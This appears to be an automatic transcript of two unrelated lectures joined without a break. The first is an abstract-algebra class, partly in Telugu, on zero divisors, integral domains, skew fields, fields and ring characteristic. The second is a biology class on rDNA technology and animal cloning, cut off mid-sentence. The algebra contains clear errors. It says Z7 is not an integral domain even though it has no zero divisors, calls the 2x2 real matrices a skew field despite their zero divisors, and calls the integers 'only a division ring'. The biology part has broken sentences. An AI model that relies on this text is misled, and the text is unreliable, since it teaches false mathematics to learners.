6 multiplication modulo 12 10 equal to 0, okay, and 8 multiplication modulo 12 9 is equal to 0. So, therefore, the zero divisors are 2, 3, 4, 6, 8, 9 and 10. These are the zero divisors in Z12. Okay. So, you just watch this example. Next, coming to the another example, suppose M2 is the set of all matrices of the 2 by 2 type. M2 is the set of all 2 by 2 matrices like A, B, C, D. Okay. So, and so on. So, this matrix is also a ring with zero divisors. Why? Because suppose if you can take A is equal to 1 0 0 0, this is a non-zero matrix. Generally, zero matrix means all entries in the matrix are 0, then that matrix is said to be zero matrix. If any one of the entry is not equal to 0, then that matrix is simply said to be non-zero matrix. So, here this element, that is this entry is non-zero, therefore, the total matrix is a non-zero matrix. Similarly, for example, B is equal to 0 0 1 0. So, this is also a non-zero matrix. So, these two are 2 by 2 matrices, these 2 by 2 matrices are in M2. Already we know that M2 is a ring with respect to matrices addition and matrices multiplication. Then AB is equal to the product of A and B is equal to the 0 0 0 0, that is equal to 0 matrix. So, here A not equal to 0
and B not equal to 0, but the product AB is equal to 0, then the elements A and B are said to be ring with said to be 0 divisors. Okay. So, we can take suppose Z, the ring of integers. Z is a ring of integers with respect to usual addition and multiplication. So, this ring is ring without 0 divisors. Why? Because if you can take any two non-zero elements in Z, for example 2 and 3, with respect to ordinary multiplication. So, 2 is a non-zero element and 3 is also a non-zero element, but the product 2 into 3 6, this is also a non-zero element. So, this ring Z and on that ring if you consider any two non-zero element, their product is also a non-zero element, therefore, that Z is a ring without 0 divisors. Okay. Next, coming to our present topic, integral domain. Okay. So, integral domain means, suppose let R comma plus comma dot be a ring. Suppose if R is a commutative ring with respect to multiplication, and suppose if 1 belongs to R, that is if R has no 0 divisors, then the ring R comma plus comma dot is said to be an integral domain. That is, the ring R comma plus comma dot is said to be an integral domain if the following postulates are satisfied. First one is R is a commutative with respect to multiplication, and R has the multiplicative identity 1, and R has no 0 divisors. Next, some examples of integral domain are the ring of integers, or the set of the set of rational numbers, the set of real numbers, the set of complex numbers. These all are the integral domains with respect to ordinary addition and ordinary multiplication. Why? Because this set are all commutative rings with respect to there is multiplication, and this set, these all are contain the multiplicative identity 1, and these all sets having no 0 divisors. Suppose if you consider the another one, that is Z7, another example, that is Z7. Suppose Z7 is equal to set of 0, 1, 2, 3, 4, 5, 6, the set of residues modulo 7. So, this is a ring with respect to addition modulo 7 and multiplication modulo 7. So, in this ring, this is this ring, for example 2 and 4. So, what is the combination of multiplication modulo 7 of these two elements is 2 multiplication modulo 7 4 is 8, 8 is divided by 7, you get the remainder as 1. That means, this 2 is a non-zero element, 4 is also a non-zero element, but the product of these two non-zero element is again a non-zero element. Okay. So, this condition may be tested for any of the two elements from this ring. So, even though this Z7 is a commutative ring, and even though this Z7 contains the unity element, but this Z7 does not having any 0 divisor, therefore, this Z7 is only a commutative ring with unity, but it does not having any 0 divisors, therefore, it is not an integral domain. And the set M2 of all 2 by 2 matrices whose entries are real numbers is not an integral domain. That is M2 is the set of all 2 by 2 matrices set, that is M2 is equal to set of all 2 by 2 matrices like this. So, this is a ring with respect to matrices addition and matrices multiplication. Suppose this ring has the identity element with respect to matrices multiplication, that element is 1 0 0 1. Even though this of course here the commutative property with respect to multiplication is not satisfied, because
in general matrices multiplication is not commutative. Therefore, the ring M2 is not an integral domain. Okay. The set M2 of all 2 by 2 matrices whose entries are real numbers is not an integral domain with respect to usual matrix addition and the matrix multiplication, because M2 is not commutative with respect to matrix multiplication. Next, unit element. Then here we already know that unity element. Unity element means the multiplicative identity, but here unit element. Then what is meant by unit element? Unit element is nothing but those elements in the ring having the multiplicative inverse. For example, in the set of rational numbers Q, suppose if you consider 2 belongs to Q. Already we know that the set of rational numbers is a ring with respect to usual addition and multiplication. Suppose if you consider any non-zero element 2, these 2 having the multiplicative inverse, that is the multiplicative inverse of 2 is 1 by 2. So, this is also an element of 2 Q. So, therefore, 2 into 1 by 2 is equal to 1 by 2 into 2 is equal to 1. So, that means 1 by 2 is the multiplicative inverse of 2. So, this 1 by 2 is an element of Q, therefore, 2 is the unit element. 2 is the unit element. That means, those elements are having the multiplicative inverse are said to be unit elements. That means, let R comma plus comma dot be the ring with unity. An element U belongs to R is said to be unit if it has the multiplicative inverse in R. Okay. Next example. Suppose if you consider Z the ring of integers, here you have only 2 units, namely -1 and 1, because -1 into 1 is equal to 1 and -1 into -1 equal to 1. That means, here the inverse of 1 is 1. So, therefore, 1 is the unit. Here the inverse of -1 is -1, therefore, -1 is also unit. Hence, the ring of integers has only 2 units, that are -1 and 1. Next, division ring or skew field. Suppose R comma plus comma dot is a ring. In case this R contains unity element and all the non-zero elements in capital R having the multiplicative inverses in capital R. That means, all the non-zero elements in R possess multiplicative inverse. Okay. So, dear students, we already know the definition of ring is R is a commutative group with respect to addition, commutative group, and R is a semi group with respect to multiplication, semi group. Okay. So, here we introduce the another 2 conditions, namely 1 belongs to R. 1 is nothing but the multiplicative identity. So, in the semi group we have a condition, that is the multiplicative identity is also there in R. And the third next one is all non-zero elements in R possess multiplicative inverses. That means, the inverse properties also exist. Inverse also exist. So, here you have closure, associative, and this is identity, and this is inverse. So, consider these 4 properties. R is a ring, R is a group with respect to multiplication. Okay. Suppose if the ring R has unity and every non-zero element in R has the multiplicative inverse, then that ring is said to be
division ring or skew field. So, this can be simply we say that if all the non-zero elements in a ring r comma plus comma dot forms a multiplicative group. Okay. So, multiplicative group means here the semi group and the identity and the inverse. So, combining these 4 properties, R is a group with respect to multiplication. Okay. So, then that ring is said to be division ring or skew field. So, the set of rational numbers, the set of real numbers, the set of complex numbers, these all are division rings or skew fields with respect to ordinary addition and ordinary multiplication. Next, the set of 2 by 2 matrices with respect to matrices addition and matrices multiplication is a skew field. Okay. So, already we know that matrices multiplication in general is not commutative. So, here there is no need for the commutative property for skew field. So, therefore, M2 is only a skew field, but whereas in the ring of integers it is not a division ring. Why? Because the element 2, this is 2 is a non-zero element, this 2 has no multiplicative inverse in Z. So, therefore, this Z is only a division ring. Next. So, the difference already we know that a division ring is only just a group with respect to multiplication. That means, R is a R comma dot is a semi group, 1 belongs to R, each non-zero element has the multiplicative inverse. So, these properties are forms consider then R is a group with respect to multiplication. Suppose if you adding the one more property that is commutative with respect to multiplication, then R is a commutative group with respect to multiplication. Already R is a commutative group with respect to addition. Suppose if you consider these properties, then R is a commutative group with respect to multiplication, and already distributive laws are also hold. Therefore, R is a field. That means, if any field, if you consider any field, that field must be a commutative group with respect to the both binary operation. While we saying the commutative group with respect to the second binary operation, that is multiplication, that is if you particularly say that all non-zero element forms the multiplicative group. So, all the non-zero elements in a ring forms a commutative group with respect to multiplication, then R is said to be a field. So, R a field has is a commutative division ring. Generally, field is denoted by the letter F. Next, Q, R, C, these all are the examples of field. Next, M2. M2 is the set of all matrices. So, this is only a skew field, but not a field, because the field property contains commutative, and in general matrix multiplication is not commutative. Therefore, M2 is only a skew field, but not a field. So, dear students, first of all you just watch the difference between the integral domain, division ring and field. So, in the integral domain, R comma plus comma dot is a ring, skew field is also R comma plus comma dot is a ring, field is also a ring. So, here it is a commutative property, satisfies the commutative property with respect to the multiplication, but the division ring does not satisfy. Remaining the that is identity element with respect to the multiplication also exists for these 3, but in the integral domain it has no zero divisors, but in the division ring and field these two both having every non-zero element in it are having the multiplicative inverse.
Okay. Now, we will introduce some theorems on integral domain. First of all, we prove that every field is an integral domain. So, before proving this, first of all we classify the differences between the field and integral domain. What is field? F is a commutative ring and integral domain is also a commutative ring. One belongs to F, that means the field is contain the multiplicative identity. Integral domain also having the multiplicative identity, but in the field every non-zero element in F has the multiplicative inverse. But whereas in the field integral domain it has no zero divisors. That is, the only difference between the field and integral domain is the set has no zero divisors. So, while we proving that every field, their students already we know that what about the without zero divisors. Without zero divisors condition can be stated in the two forms, namely A not equal to 0, B not equal to 0, that implies A B is also not equal to 0. This is one condition for ring without zero divisors. And the another one is, if we consider A B is equal to 0, that implies either A equal to 0 or B is equal to 0. So, this condition states for the ring without zero divisors. Now, I shall prove that field has no zero divisors for the proving of every field is an integral domain. So, for that, suppose I can consider A not equal to 0, this element belongs to F and B is also an element of F. Already F is a field. So, according to the definition of field, every non-zero element in the field has multiplicative inverse. That means A inverse is also exist in F, such that A into A inverse is equal to A inverse into A is equal to the identity element 1. So, suppose if you consider A B is equal to 0 and I will multiply A inverse on the pre side of this equation, that is A inverse into A B is equal to A inverse into 0. So, by using the associative property A inverse A into B is equal to 0, that is A inverse into A is equal to 1. So, therefore, 1 into B is equal to 0, that means B is equal to 0. So, you consider A B is equal to 0, that means B is equal to 0. Again, suppose if B is not equal to 0, this element belongs to F and A is some any other element in F. So, here B is a non-zero element. We know that every non-zero element in F has a multiplicative inverse. Similarly, B inverse is also exist in F such that B inverse into B is equal to B into B inverse is equal to 1. Suppose if you having that is if you consider A B is equal to 0, so that is B inverse multiply on the right side of this equation, that is A B into B inverse is equal to 0 into B inverse. So, that is by using the associative property A into B inverse is equal to 0, that is A into 1 is equal to 0, that implies A equal to 0. Okay. So, dear students, please watch. So, from this relation I can say that this field has no zero divisors. Already we know that every field is a commutative ring and every field has unity element. From this relation there is a field has no zero divisor. So, commutative ring, unity element and it has no zero divisors, these all are the three properties of integral domain. Therefore, F there is every field is an integral domain. Okay. Next example, the ring of integers, that is z comma plus comma dot, is an integral domain, but not a field. So, here we prove that every field is an integral domain, but the converse, that is every integral domain need not be a field. For proving this condition, that is every integral domain need not be a field, is I can take one example, the ring of a non-zero element 2 having no multiplicative inverse in Z. Okay. Next,
coming to the one more important theorem, that is every finite integral domain is a field. So, suppose I can consider the D an integral domain. So, integral domain means it is a commutative ring, it is unity, and it has no zero divisor. For the sake of that condition, I can take the elements 0. 0 is the identity element with respect to addition, and it has unity, that is 1, and some non-zero elements x1, x2 and so on xn. Okay, here these are n elements, this is 1, this is 2, totally this is n plus 2 elements, this D contains n plus 2 elements. So, these all are distinct elements, that means here x1 is not equal to x2 and x2 is not equal to x3 and so on. So, that means all elements are distinct elements. So, now I will prove that this integral domain is a field. Okay. For proving this, I can classify the difference between the integral domain and field. So, integral domain means it is a commutative ring. So, field has also the commutative ring, it has unity element. So, field has also the same property, but the third one is it has integral domain has no zero divisor. I will show that this integral domain, in integral domain every non-zero element has multiplicative inverse, then this integral domain becomes a field. Okay. For that, I can consider some non-zero element in capital D. Okay. So, here 0 belongs to D. Next, same x belongs to D, and I can consider 1 belongs to D, that implies x into 1. So, this is also an element of D. Next, similarly x belongs to D and x1 belongs to D, that implies x into x1 belongs to D. So, by applying the same condition for all the elements in D, I got that is x last element is x xn belongs to D. Okay. So, by the closure property x into 0, x into 1, x into x1 and so on, these all are the elements in D. Okay. So, and moreover these all elements are distinct elements. Why? Because suppose if I consider there is any two elements of these are equal, what will be happen? That is x xi is equal to x xj for I not equal to j. So, that implies x xi minus x xj is equal to 0. That implies I can take the x as common, that is x into xi minus xj is equal to 0. Okay. So, dear students, please note the this type of relation. This is nothing but a into b is equal to 0. So, this is a into b is equal to 0 means the already D is an integral domain. So, integral domain means it has no zero divisors. Then what is the property for no zero divisors condition? Suppose if you consider a b is equal to 0, that implies either a is equal to 0 or b is equal to 0. So, this is of the form a b is equal to 0. That means if you have either a x equal to 0 or xi minus xj is also are equal to 0. But you take x is a non-zero element in x is a non-zero element in D. So, this is non-zero. So, therefore, the only chance is xi minus xj is equal to 0. So, according to this xi is equal to xj. That means, so in this group, in this elements there are some repetition, that is not possible because D contains n plus 2 different elements. Suppose if you can take this relation, then there is some equal elements are there. So, this is not possible, hence this is also not possible. Okay. So, therefore, these all are, that means x x1 x1 to 1, x x1, x xn, that is these all are different elements in
D. Okay. But originally D is a finite set. So, D is a finite set, therefore, already we know that D contains only these type of elements. So, here we contain again some additional elements, namely x x1, x into 1, x x1, x x2 and so on. So, suppose here n plus 2 elements are there, suppose these elements are also in the D, therefore, suppose if these two elements are different, that means these two elements are different, already here n plus 2 elements, here n plus 1 elements. So, total elements are 2n plus 3 elements. Okay. But so the D contains only n plus 2 elements, that is why the only chance is these elements and these elements must be the same in some different order. So, therefore, suppose if you consider x into 1 is equal to some 1. So, therefore, x is equal to 1, and suppose if you consider x xi is equal to some 1 and that way. So, therefore, suppose if you x xi is equal to suppose some 1, that means this is of the form a b is equal to 1. So, this a b is equal to 1 says b is the inverse of a, that is b is the inverse of a. That means according to the definition of existence of inverse, so x xi is equal to 1 means xi is the inverse of x. Okay. So, x xi is the inverse of x, already x is a non-zero element. So, by the argument of this, so every non-zero element x has the multiplicative inverse in D. Okay. So, therefore, the integral domain, every non-zero element in integral domain has the multiplicative inverse, that means that integral domain forms a field. Okay. Next, coming to the definition, nilpotent element. Nilpotent element means, suppose let r comma plus comma dot be a ring and A is some non-zero element. In case if there exists some natural number n such that a power n is equal to 0, that is this 0 is the identity element with respect to the addition, then the non-zero element A is said to be nilpotent element in R. Suppose you consider the example Z8. Z8 is the residues of addition residues modulo 8. So, in this set 2 and 4 are the nilpotent elements, because 2 cube is 2 into 2 into 2, that is 8, 8 can be divided with 8, therefore, the remainder is 0. Similarly, 4 square is also 0, therefore, 2 and 4 are the nilpotent elements in Z8. But there is no nilpotent element in Z6 with respect to addition modulo 6 and multiplication modulo 6. Idempotent element. So, idempotent element is a square is equal to a. While we consider the nilpotent element a power n is equal to 0, but in the idempotent a square equal to a. But in the integral domain we have only two idempotent elements, one is 0 and another one is 1. Okay. Now, we will discuss the characteristic of an integral domain. First of all, we will discuss the definition for the characteristic of a ring. Suppose if r comma plus comma dot is a ring,
and if you can take any some least positive integer p such that pa is equal to 0 for all a belongs to R. That means for every element in R, you must add that element for p times, the resultant is 0. Then such least positive integer p is said to be the ring of the characteristic of the ring. Suppose if you have no such positive integer, that means if you add any element up to p times or q times or whatever it may be, so if up to infinite times you do not get any 0, then that the characteristic of that ring is 0. So, for example, R equal to set of 0, 1, 2, 3, 4, 5, 6. This is a ring with respect to addition modulo 7 and multiplication modulo 7. So, in this example, suppose Z7 is equal to 0, 1, 2, 3, 4, 5, 6. So, this is a ring with respect to the addition modulo 7 and multiplication modulo 7. Suppose if you can take 0, of course 0 is the directly 0, so there is no problem for 0. Next coming to the 1, so 1 can be added up to 7 times. 7 times. So 7 times means you get only 7. 7 is divided by 7. Therefore, the remainder is 0. That means 7 into 1 is equal to 0. Similarly, 7 into 2, that is 2 is added up to 7 times. Therefore, the value is 14. 14 is divided by 7. Therefore, the remainder is 0. Similarly, 7 into 3 is also 0. 7 into 4 is also 0. 7 into 5 is also 0. 7 into 6 is also 0. So, that means 7 into, if here suppose if you can consider the one time. So, suppose 1 into 2 is not equal to 0, and suppose 3 into 2 is also not equal to 0, 4 into 2 is also not equal to 0, 5 into 2 is also not equal to 0, 6 into 2 is also not equal to 0. So, అంటే దట్ మీన్స్ ఇక్కడ మనం ఏం చెప్పదలుచుకున్నామంటే ఏని 7 టైమ్స్ యాడ్ చేస్తేనే 0 అవుతుంది, అంతకంటే తక్కువ సార్లు మల్టిప్లై దట్ ఇస్ యాడ్ చేస్తే మీకు 0 వచ్చే ఛాన్స్ లేదు. సో హియర్ దట్ మీన్స్ ఏ 7a is congruent to 0 mod 7 for all a belongs to R. So, that is 7a is equal to 0 for all a belongs to R. So, here p is the less than the 7, that means p is the least value of 7. So, there is, if there is no chance p into 1 is equal to here the only chance is p into 1 equal to p, that is not equal to 0. So, the 7 is the only least value. You can that is ఇప్పుడు మీరు మల్టిప్లై చేయదలుచుకుంటే 14 టైమ్స్ 2ని యాడ్ చేసినా కూడా 0 అవుతుంది, 14 టైమ్స్ 3ని యాడ్ చేసినా కూడా 0 అవుతుంది. బట్ 7 టైమ్స్ 14 టైమ్స్ 21 టైమ్స్ ఇలా మీరు తీసుకున్నప్పుడు ఈ 7, 14, 21లో లీస్ట్ ఏంటంటే 7. కాబట్టి 7 ఈస్ ది క్యారెక్టరిస్టిక్ ఆఫ్ ది రింగ్. నెక్స్ట్ the ring of integers. So, the ring of integers has the characteristic 0 because suppose if మీరు z తీసుకున్నారు అనుకోండి రింగ్ ఆఫ్ ఇంటీజర్స్, దీంట్లో మీరు ఫర్ ఎగ్జాంపుల్ 1 తీసుకున్నారు, 1ని మీరు ఎన్నిసార్లు యాడ్ చేసినా కూడా మీకు 0 వచ్చే ఛాన్స్ లేదు కాబట్టి ద క్యారెక్టరిస్టిక్ ఆఫ్ ఇంటీజర్స్ z ఈజ్ 0. దట్ మీన్స్ ద క్యారెక్టరిస్టిక్ ఆఫ్ ద రింగ్ z with respect to addition multiplication is 0 because for every a belongs to z there exists no positive integer n such that n a is equal to 0. Next, some important point is the characteristic of an integral domain r comma plus comma dot is 0 or a positive integer according as the order of any non-zero element of R regarded as a member of the additive group R. So, this is the condition for that. Suppose r comma plus comma dot is a ring.
సో వాట్ ఈస్ ద డెఫినేషన్ ఆఫ్ రింగ్? సో రింగ్ చెప్పాలంటే ఫస్ట్ ఆఫ్ ఆల్ ఇది అడిషన్తో కామ్యుటేటివ్ గ్రూప్ అయి ఉండాలి. సపోజ్ నేను రింగ్లో ఏదైనా ఒక ఎలిమెంట్ తీసుకుంటే అది ఆటోమేటిక్గా ఎక్కడ ఉంటుంది? ఆర్ కామా ప్లస్ అనే కామ్యుటేటివ్ గ్రూప్లో కూడా ఉంటుంది. సో ఇది ఆర్ కామా ప్లస్ అనే కామ్యుటేటివ్ గ్రూప్లో ఏ అనే ఎలిమెంట్ ఎగ్జిస్ట్ అయింది కాబట్టి ఈ కామ్యుటేటివ్ గ్రూప్లో ఏ అనే ఎలిమెంట్ యొక్క ఆర్డర్ ఎంతైతే ఉంటుందో దట్ ఆర్డర్ ఎయిదర్ 0 ఆర్ ఫైనైట్, వాట్ ఎవర్ ఇట్ మే బి, 0 ఆర్ ఫైనైట్. సో మీరు ఏదైనా రింగ్లో ఒక ఎలిమెంట్ తీసుకుంటే అది ఆటోమేటిక్గా కామ్యుటేటివ్ గ్రూప్లో కూడా ఉంటుంది కాబట్టి of the ring. Next, this is an important theorem. The characteristic of an integral domain is either prime or 0. Okay, let r comma plus comma dot be an integral domain and let a is any non-zero element. So a is a non-zero element అని చెప్తున్నాను కాబట్టి ఇది ఎక్కడ వస్తుంది? కామ్యుటేటివ్ గ్రూప్లో కూడా వస్తుంది. Here there are two conditions. One is order of A is equal to 0 or order of A is equal to finite. There are two chances. Suppose if you consider order of A is equal to 0. Already నేను చెప్పున్నానండి, సపోజ్ ఒక నాన్ జీరో ఎలిమెంట్కి అడిటివ్ గ్రూప్లో ఏదైతే ఆర్డర్ ఉంటుందో అదే ఆర్డర్ ఆ రింగ్ యొక్క క్యారెక్టరిస్టిక్ అవుతుంది. కాబట్టి సపోజ్ ఇఫ్ మీరు ఏ యొక్క ఆర్డర్ 0 అని తీసుకుంటే then automatically the characteristic of R is equal to 0. Suppose order of A is equal to finite అనుకున్నాను అంటే ఫర్ ఎగ్జాంపుల్ P. సో ఇప్పుడు నేనేం చేయాలంటే ఈ P అనేది ప్రైమ్ అని ప్రూవ్ చేయాలి. P అనేది ప్రైమ్ అని ప్రూవ్ చేయాలి. సో ఫర్ ది సేక్ ఆఫ్ దర్ ఇస్ I will prove this one as a contradiction, like suppose P is not a prime. P is not a prime. So prime కాదంటే అది ఎలా ఉండాలి? That number can be expressed as the factor of two numbers, that is P is equal to P1 into P2, where P1 P2 are any numbers between 1 and P. P1 P2 కూడా రెండు 1 P మధ్యలో ఉంటుంది. సపోజ్ ఇక్కడ ఫర్ ఎగ్జాంపుల్ ఏ బి అనేటటువంటి టూ ఎలిమెంట్స్ ఆర్లో కన్సిడర్ చేస్తాను. బై యూజింగ్ క్లోజర్ ప్రాపర్టీ ఏ బి ఈజ్ ఆల్సో అన్ ఎలిమెంట్ ఆఫ్ ఆర్. ఐ నో దట్ ద క్యారెక్టరిస్టిక్ ఆఫ్ క్యాపిటల్ ఆర్ ఇస్ ఈక్వల్ టు పి. సో ద డెఫినేషన్ ఆఫ్ క్యారెక్టరిస్టిక్ ఆఫ్ క్యాపిటల్ ఆర్ అంటే ఏంటి? క్యాపిటల్ ఆర్లో ఉండే ప్రతి ఎలిమెంట్ని మనం పి టైమ్స్ యాడ్ చేస్తే 0 వస్తుంది అని. సో ఏబి అనే ఎలిమెంట్ కూడా క్యాపిటల్ ఆర్లో ఉంది కాబట్టి ఏబి అనే ఎలిమెంట్ని కూడా నేను పి టైమ్స్ యాడ్ చేస్తే 0 రావాలి. దట్ ఈస్ పిఏబి ఇస్ ఈక్వల్ టు 0. ఓకే, సో దిస్ ఈజ్ వన్ కండిషన్. పక్కన పెడదాం. నెక్స్ట్ P1 అనేది ఎలా ఉంది? P కంటే తక్కువ ఉంది. నెక్స్ట్ ఏ అనే ఎలిమెంట్ ఆర్లో ఉంది. ఏ అనే ఎలిమెంట్ ఆర్లో ఉంది. P1 అనే వాల్యూ దట్ ఈస్ P కంటే చిన్నది కాబట్టి, స్మాలర్ దెన్ P కాబట్టి ఇక్కడ అకార్డింగ్ టు ది కండిషన్ ఆఫ్ క్యారెక్టరిస్టిక్ P1A ఈజ్ నాట్ ఈక్వల్ టు 0 కావాలి. సో క్యారెక్టరిస్టిక్ అంటే ఎట్లా ఉండాలి? క్యాపిటల్ ఆర్లో ఉండే ప్రతి ఎలిమెంట్ని P టైమ్స్ యాడ్ చేస్తేనే 0 రావాలి. అంతకంటే తక్కువ సార్లు యాడ్ చేస్తే 0 వచ్చే ఛాన్స్ లేదు. కాబట్టి ఏని నేను P1 టైమ్స్ యాడ్ చేస్తే 0 వచ్చే ఛాన్స్ లేదు. కాబట్టి P1A ఈజ్ నాట్ ఈక్వల్ టు 0. Similarly, B belongs to R and P2 some element. So P2 is the smaller than P. Therefore, P2B is also non-zero. సో ఇక్కడ B అనేటటువంటి ఎలిమెంట్ P టైమ్స్ యాడ్ చేస్తే 0 అవుతుంది, కానీ P కంటే తక్కువ సార్లు యాడ్ చేస్తే 0 వచ్చే ఛాన్స్ లేదు. కాబట్టి P2B is not equal to 0. So here P1A is not equal to 0 and P2B is also not equal to 0. But P1A into
P2B is also not equal to 0. Why? Because here I consider an integral domain. In this integral domain, there are no zero divisors. So, what is meant by zero divisors? The product of two non-zero elements is again a non-zero element. So, this is a non-zero element and this is also a non-zero element. Therefore, the product of two non-zero elements is again a non-zero element. So, this can be written as P1 P2 into AB is equal to 0, sorry, not equal to 0. Then P1 P2 is P, this is PAB is not equal to 0. Here I got PAB is equal to 0. According to this, PAB is not equal to 0. So, these two are different contradicts. Why I get the contradiction? Because I assumed that P is not a prime. So, therefore, the only chance is P is a prime number. That means the characteristic of an integral domain is either 0 or a prime number. Okay. Next, the characteristic of a field is either prime or 0. So, ఇప్పుడు మనం ఏం ప్రూవ్ చేస్తాం, క్యారెక్టరిస్టిక్ ఆఫ్ అన్ ఇంటెగ్రల్ డొమైన్ ఈస్ ఎయిదర్ 0 ఆర్ ప్రైమ్ అని చెప్పాం. ఇప్పుడు ఏం చెప్పాలి, ద క్యారెక్టరిస్టిక్ ఆఫ్ ఎ ఫీల్డ్ ఈస్ ఎయిదర్ 0 ఆర్ ప్రైమ్. నెక్స్ట్ సమ్ ప్రాబ్లమ్, let R be the ring A square equal to A for all A belongs to R, then show that the characteristic of capital R is 2 or the Boolean ring characteristic is 2. So, Boolean ring means A square equal to A for all A belongs to R. So, now I will show that the characteristic of a Boolean ring is 2. So, A plus A is also an element of R by using the closure property with respect to addition. So, R is a Boolean ring, therefore, every element is in the form of A square equal to A. Therefore, A plus A whole square is also A plus A. So, this A plus A whole square can be written as A plus A into A plus A, that is equal to A plus A. So, I will multiply A into A square plus A square A plus this is A plus this is A plus A equal to A plus A. Problem for adding this 0. I will using the left cancellation law with respect to addition. So, therefore, I got 2A is equal to 0. So, A is any element that A can be added 2 times, that value is 0. So, 2A is equal to 0 and 1A means A, that already I can take it as A not equal to 0. So, 1A is not equal to 0. So, therefore, the least positive integer is 2 such that 2A is equal to 0. Hence, the characteristic of Boolean ring is 2. So, there is one more problem. If the characteristic of a ring is 2 and the elements A and B are of the ring commute, then prove that A plus B whole square equal to A square plus B square or that equal to A minus B whole square. So, the characteristic of capital R is equal to 2. So, there are given one more condition is A and B are commute. A and B are commute means AB is equal to BA. So, now we will prove that A plus B whole square is equal to A square plus B square. So, for A plus B whole square means A plus B into A plus B. So, this can be written as A square plus AB plus BA plus B square. So, that is A square plus 2AB plus B square. So, we know that the characteristic of capital R is equal to 2. That means, every element added up to 2 times, that value is 0. So, here A is an element, B is these two elements are R. So, by using closure property with respect to multiplication, AB is also an element of R.
they are given that the characteristic of capital R is equal to 2. So, therefore, 2ab is equal to 0. So, that means this value becomes 0. So, therefore, you get a square plus b square. So, a plus b whole square equal to a square plus b square. So, this similar proof can also be obtained for a minus b whole square also. So, this is also a minus b into a minus b, that is a square minus ab minus ba plus b square. So, this ba can be written as ab minus plus b square. This ab is 2ab plus b square. So, 2ab value is 0, therefore, you get again a square plus b square. So, in this a plus b whole square and a minus b whole square is equal to a square plus b square. Okay. So, dear students, in this class we will learn what is meant by integral domain, what is the division ring or skew field, what is the field, and some important theorems on integral domain. Good morning, students. Myself, I am Dr. Srinivas from Silver Jubilee Government College, Kurnool. Today, I would like to explain about the rDNA technology, which is very important for the students of biology, and where there are subtopics called as adapters and linkers, gene transfer methods, and PCR. So, coming to the aspect of use the living organisms to produce the valuable products of which are useful for the human welfare. So, using the technology and the knowledge of cells to modify their activities in order to make living organisms more effective, where the technology is applied in the field of biotechnology in the form of a biology, I can say. So, why we are using the technology in the biology? Why we need this? As if the population is growing on, there is a high increasing in the population over the period of 30 to 40 years, and new issues are coming on, and there is a scarcity in the food, scarcity in the living environment, and there is a high requirements. So, in order to reach these requirements, we need to have to develop some new technological processes, I can say, by using the living organisms. So, if you can go back, the old process so called as the telegraph, later on it was converted, or it was evolved to a phone, land phones, then to mobile, then to pager, now the smartphones, and future will be the virtual. So, look at the change, and that technology should be useful for the humankind and for the human welfare. So, look at this funny picture. This was depicted by some of the animator, where he jointed a scorpion with a snake and a shark fish with a cat. Looking to be funny, but it has a lot of meaning. He had an idea that there might be a chance in future that the snake may be combined or snake may be cloned with a scorpion. That might be termed as a hybrid, and cat may have a big teeth which are very, very aggressive teeth, I can say, which can be combined with a shark. So, this sort of animals can be termed as a hybrids, and the usage of technology is called as a cloning. And we all know that a gene is a segment of a DNA which codes for an RNA or a polypeptide. So, a clone is a group of organisms or cells or molecules arising from a single individual. So, we are going to have a target DNA, a specified DNA which you require, which we require, and you are going to clone it into number of
number of I can say copies. So, that is called as a gene cloning. So, gene cloning is a wider spectrum in the present biotechnology, where it has different steps. I can say it is the usage of gene technology or gene cloning, it varies from species to species, but the gene cloning has a specific process which involves an RDNA technology, where you have to follow the following steps, which are shown as: you need to select the DNA, you need to join the DNA with the vector, you need to introduce the vector into a specific host, then you need to amplify the host or the bacteria, and you need to select the transformants which you require. They are the basic steps of RDNA technology, which is a part of gene cloning. So, coming to the part of cloning, it is a process of producing multiple copies of a similar type. You might have seen a recent movie called as a Robo, where you will find a similar sort of robots with no difference. So, clone is derived from a word called as a twig, and in molecular biology we are using this cloning in different fields. The one is called molecular cloning or molecule cloning, where you will extract the monoclonal antibodies and the multiplication of DNA. In cell cloning, you will culture the bacterium and culture of animal cells, where you will find in stem cells, which is a booming field, and organism cloning, where you will find in animal cloning as well as in the micro propagation. So, this cloning is a technique which is widely used in animals as well as the plants, in prokaryotes as well as in the eukaryotes. In the plants, by the cloning, recently it was a big, I can say, drift that we have produced a BT cotton, which is a high resistant cotton, and that cotton has as a transgenic, I can say it is a transgenic plant, and it had a resistant power over the many what I can say, the insects. So, the second thing, many pictures have shown the second slide, second picture, so called as a golden rice, and it has a high I can say vitamin A. So, that sort of a rice being produced by the gene cloning technique, and this is one of the technology which will be used in plants. So, recently the gene cloning technology is widely used in the plants. So, coming to the animals. So, in animals a wide range of cloning is going on, and I have given three important aspects of cloning in animals. One is the reproductive cloning, second one is the gene cloning, third one is the therapeutic cloning. So, you are all aware that recently we are having a problem with the recent couples where there is a lack of child because of some sort of problems. So, that can be cured or that can be managed with the reproductive cloning. In reproductive cloning, there are two basic categories called as embryo splitting and nuclear transfer. And the coming to the other one, that is called as gene cloning, the production of multiple copies, where we already read in the previous slides, and it is very useful in genetic engineering. And the third most important aspect of the cloning is called therapeutic cloning, which is widely used in all the research institutes, where the major aspect in the therapeutic cloning is one of the example is the cancer. The cure of cancer or the minimization of the cancer cells can be happened through this therapeutic cloning. So, creation of new tissues and organs from single cells. This does not create any genetically identical individuals, but helpful in the humankind for curing the diseases. So, the methodology which involves in the reproductive cloning is one, the enucleation of egg. You are all aware that we need to take out the nucleus from the egg. Then there is an introduction or induction of the particular cells, then nuclear transfer, activation of egg, then embryo transfer to the mother, and pregnancy confirmation and checking for genetic identity. This is a general process, I can say, which will be seen in the reproductive cloning. I can say in the biotechnology when it comes to the cloning. So, this cloned aspect was clearly given by these two eminent scientists, and this has proved that as cloning can be happened in eukaryotes, because so far from the 1970s
the cloning was seen only in the prokaryotes, especially in the E. coli bacteria, and there is a transformation that the cloning can happen in the eukaryotes, and the example you will see in the screen that there is a northern leopard frog. And most of the students are aware of this beautiful topic called as dolly. Dolly is one of the topic in cloning where we will study this dolly since the previous classes, like from our childhood. So this was a story which links to animal biotechnology. So the dolly was originated in July 5th and it died on. Cloning can happen in the animals, and through the cloning we can generate a new sort of animals without any reproduction. And it has raised a number of important issues that some problems which are seen in the cloning can be I can say they can be modified in future. So this is a process that created in the creation of dolly, that the enucleated cell and fusion of that particular nucleus with an egg and culturing and putting into a uterus or womb of a female for developing a lamb. So this slide depicts 84 to 2002 or 2003. Lot of aspects has been come, like the production of lambs, production of calves, and production of new type of sheep and transgenic sheep, and the production of mice, rat, as well as the small middle picture which is called as a tetra. This is a female rhesus monkey named as a tetra, was cloned by splitting early embryos, which was developed in 1999, and 